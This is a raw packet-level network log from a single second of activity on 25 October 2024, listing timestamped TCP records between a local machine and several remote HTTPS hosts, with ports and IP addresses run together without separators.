                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.355494022 CEST49717443192.168.2.16104.17.24.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.355523109 CEST44349717104.17.24.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.355675936 CEST44349717104.17.24.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.355729103 CEST49717443192.168.2.16104.17.24.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.355905056 CEST49717443192.168.2.16104.17.24.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.355931044 CEST44349717104.17.24.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.356502056 CEST44349716151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.356564045 CEST44349716151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.356596947 CEST49716443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.356631994 CEST44349716151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.356659889 CEST49716443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.356678009 CEST49716443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.367650986 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.367717981 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.368446112 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.369139910 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.369173050 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.399240971 CEST49678443192.168.2.1620.189.173.10
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.451277018 CEST44349719184.28.90.27192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.451385021 CEST49719443192.168.2.16184.28.90.27
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.452353001 CEST49719443192.168.2.16184.28.90.27
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.452369928 CEST44349719184.28.90.27192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.452866077 CEST44349719184.28.90.27192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.453824997 CEST49719443192.168.2.16184.28.90.27
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.477440119 CEST44349716151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.477555037 CEST49716443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.477566957 CEST44349716151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.477596998 CEST44349716151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.477638006 CEST49716443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.477638006 CEST49716443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.495331049 CEST44349719184.28.90.27192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.599653006 CEST44349716151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.599705935 CEST44349716151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.599754095 CEST49716443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.599778891 CEST44349716151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.599832058 CEST49716443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.599832058 CEST49716443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.617218971 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.617475986 CEST49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.617516994 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.618649006 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.619096994 CEST49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.619234085 CEST49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.619247913 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.619283915 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.645483971 CEST44349716151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.645610094 CEST49716443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.645626068 CEST44349716151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.645659924 CEST44349716151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.645730019 CEST49716443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.645939112 CEST49716443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.645966053 CEST44349716151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.645988941 CEST49716443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.646023989 CEST49716443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.659955978 CEST49722443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.659993887 CEST44349722151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.660073042 CEST49722443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.660247087 CEST49722443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.660263062 CEST44349722151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.669945002 CEST49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.696432114 CEST44349719184.28.90.27192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.696618080 CEST44349719184.28.90.27192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.696943998 CEST49719443192.168.2.16184.28.90.27
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.697268963 CEST49719443192.168.2.16184.28.90.27
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.697299004 CEST44349719184.28.90.27192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.697313070 CEST49719443192.168.2.16184.28.90.27
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.697320938 CEST44349719184.28.90.27192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.700978994 CEST49678443192.168.2.1620.189.173.10
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.787960052 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.788081884 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.788166046 CEST49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.788170099 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.788199902 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.788248062 CEST49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.788288116 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.788438082 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.788520098 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.788577080 CEST49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.788597107 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.788845062 CEST49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.788860083 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.842941999 CEST49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.842961073 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.890976906 CEST49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.906593084 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.906749964 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.906799078 CEST49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.906816006 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.906898022 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.906960011 CEST49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.906972885 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.907418013 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.907501936 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.907572985 CEST49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.907588959 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.907696962 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.907754898 CEST49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.907768011 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.907815933 CEST49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.976891994 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.977139950 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.977178097 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.978173018 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.978244066 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.978517056 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.978585958 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:46.978635073 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.019325972 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.025520086 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.025674105 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.025769949 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.025856018 CEST49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.025881052 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.026132107 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.026213884 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.026213884 CEST49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.026240110 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.026293993 CEST49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.026552916 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.026699066 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.026751995 CEST49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.026765108 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.027232885 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.027302980 CEST49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.027329922 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.027641058 CEST49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.031990051 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.032006025 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.078959942 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.127975941 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.128029108 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.128057957 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.128092051 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.128119946 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.128130913 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.128159046 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.128184080 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.128207922 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.128253937 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.128268957 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.128318071 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.128700018 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.128767967 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.129019022 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.129033089 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.146631002 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.146713972 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.146752119 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.146759033 CEST49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.146785021 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.146835089 CEST49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.146847010 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.146895885 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.147399902 CEST49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.147553921 CEST49720443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.147583961 CEST44349720104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.163791895 CEST49723443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.163850069 CEST44349723104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.163954020 CEST49723443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.164594889 CEST49723443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.164624929 CEST44349723104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.175004959 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.175832033 CEST49724443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.175870895 CEST44349724104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.176377058 CEST49724443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.176547050 CEST49724443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.176562071 CEST44349724104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.247620106 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.247677088 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.247721910 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.247788906 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.247807980 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.247867107 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.247896910 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.247898102 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.247909069 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.248009920 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.248024940 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.248289108 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.248781919 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.281804085 CEST44349722151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.282169104 CEST49722443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.282191038 CEST44349722151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.284041882 CEST44349722151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.284121037 CEST49722443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.284390926 CEST49722443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.284518003 CEST44349722151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.284518003 CEST49722443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.302982092 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.302983046 CEST49678443192.168.2.1620.189.173.10
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.302997112 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.327333927 CEST44349722151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.334978104 CEST49722443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.334992886 CEST44349722151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.350975990 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.367222071 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.367405891 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.367475986 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.367489100 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.367577076 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.367665052 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.367676973 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.367769957 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.367847919 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.367858887 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.367961884 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.368027925 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.368040085 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.368140936 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.368227959 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.368242979 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.368254900 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.368540049 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.382978916 CEST49722443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.414586067 CEST44349722151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.414777040 CEST44349722151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.414844990 CEST49722443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.414865971 CEST44349722151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.414956093 CEST44349722151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.415035009 CEST49722443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.415049076 CEST44349722151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.415157080 CEST44349722151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.415221930 CEST49722443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.415235043 CEST44349722151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.415664911 CEST44349722151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.415746927 CEST49722443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.415751934 CEST44349722151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.415781975 CEST44349722151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.415831089 CEST49722443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.480443001 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.480611086 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.480676889 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.480695963 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.480788946 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.480846882 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.480858088 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.481062889 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.481132984 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.481195927 CEST49721443192.168.2.16104.17.25.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.481218100 CEST44349721104.17.25.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.533746004 CEST44349722151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.533879995 CEST44349722151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.533955097 CEST49722443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.533977032 CEST44349722151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.571947098 CEST49673443192.168.2.16204.79.197.203
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.587984085 CEST49722443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.652971029 CEST44349722151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.652998924 CEST44349722151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.653049946 CEST49722443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.653067112 CEST44349722151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.653100014 CEST49722443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.653100967 CEST44349722151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.653124094 CEST49722443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:47.653125048 CEST44349722151.101.194.137192.168.2.16
